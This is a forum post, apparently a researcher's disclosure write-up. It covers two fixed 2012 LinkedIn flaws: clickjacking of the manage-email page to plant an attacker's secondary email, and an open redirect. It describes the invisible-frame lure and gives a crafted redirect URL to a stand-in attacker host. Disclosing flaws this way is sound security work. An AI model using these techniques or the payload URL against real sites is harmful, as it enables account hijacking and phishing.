• Linkedin's Clickjacking & Open Url Redirection Vulnerabilities

    # Vulnerability Title: Secondary Email Addition & Deletion Via Click Jacking in Linkedin
    # Website Link: [Tried on Indian version]
    # Found on: 06/08/2012
    # Author: Ajay Singh Negi
    # Version: [All language versions would be vulnerable]
    # Tested on: [Indian version]
    # Reported On: 07/08/2012
    # Status: Fixed
    # Patched On: 10/09/2012
    # Public Release: 15/09/2012



    Summary


    A Clickjacking vulnerability existed on Linkedin that allowed an attacker to add or delete a secondary email and can also make existing secondary email as primary email by redressing the manage email page.


    Details


    Linkedin manage email page (a total of 1 page) was lacking X-FRAME-OPTIONS in Headers and Frame-busting javascript measures to prevent framing of the pages. So the manage email page could be redressed to 'click-jack' Linkedin users. Below I have mentioned the vulnerable Url and also attached the Proof of concept screenshots.




    1. Click Jacking Vulnerable Url:
    https://www.linkedin.com/settings/manage-email?goback=.nas_*1_*1_*1




    Click Jacking Vulnerability POC Screenshots:








    The redressed editor page with frame opacity set to 0 so it is invisible to the user. As the user drags the computer into the trash-bin and clicks the Go button, a new secondary email will be added into the Linkedin user's account.










    With the frames opacity set to 0.5 you can clearly see the redressed page and all the background. The computer is actually a text area that contains the attacker's email address which is selected by default with the computer image(Using JavaScript), once the Linkedin user drags the computer he will actually drag the attackers email address into the add secondary email address area and when he will click the go button, the Linkedin user will actually click the redressed add email address button and the attackers email will be successfully added in the Linkedin users account.










    Secondary email added successfully into the Linkedin users account.












    No X-Frame-Options in servers response header.


    Linkedin addressed the vulnerability by adding X-FRAME-OPTIONS in header field which is set to SAMEORIGIN on this page.






    # Vulnerability Title: Open Url Redirection in Linkedin
    # Website Link: [Tried on Indian version]
    # Found on: 05/08/2012
    # Author: Ajay Singh Negi
    # Version: [All language versions would be vulnerable]
    # Tested on: [Indian version]
    # Reported On: 06/08/2012
    # Status: Fixed
    # Patched On: 07/09/2012
    # Public Release: 15/09/2012



    Summary


    Open Url Redirection using which an attacker can redirect any Linkedin user to any malicious website. Below I have mentioned the vulnerable Url and also attached the Proof of concept video.


    Original Open Url Redirection Vulnerable Url:


    https://help.linkedin.com/app/utils/...om_auth%2Ftrue



    Crafted Open Url Redirection Vulnerable Url:
    https://help.linkedin.com/app/utils/log_error/et/0/ec/7/callback/http%3A%2F%2Fattacker.in



    Open Url Redirection Vulnerability POC Video:





    Special Thanks to AMol NAik and all G4H members.
    This article was originally published in forum thread: Linkedin's Clickjacking & Open Url Redirection Vulnerabilities started by ajaysinghnegi View original post
  • G4H Facebook

  • G4H Twitter